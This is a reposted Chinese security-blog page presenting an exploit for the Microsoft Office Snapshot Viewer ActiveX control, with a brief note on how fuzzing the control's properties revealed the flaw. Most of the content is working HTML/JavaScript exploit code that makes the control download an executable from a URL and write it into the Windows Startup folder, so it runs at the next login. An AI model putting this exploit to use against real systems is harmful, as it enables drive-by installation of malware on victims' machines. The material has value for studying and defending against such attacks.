Microsoft Office Snapshot Viewer ActiveX Exploit 's

admin 2017年4月18日17:28:20评论407 views字数 516阅读1分43秒阅读模式
摘要

来源:http://hi.baidu.com/cloie/今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞

来源:http://hi.baidu.com/cloie/

今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞

EXP:

 <html> <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object> <script language='javascript'>  var buf1 = 'http://127.0.0.1/a.exe&#39;; var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe'; obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot(); </script> </html> 

Fuzzing 时一般是对单个Property和单个Method()做FUZZ,这时会检测到对SnapshotPath有HTTP GET。然后想想它总是需要保存到本地的,再测试其他Property。由于此ActiveX的Property和Method都非常少,很快可以 FUZZ完

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月18日17:28:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Microsoft Office Snapshot Viewer ActiveX Exploit 'shttps://cn-sec.com/archives/45206.html

发表评论

匿名网友 填写信息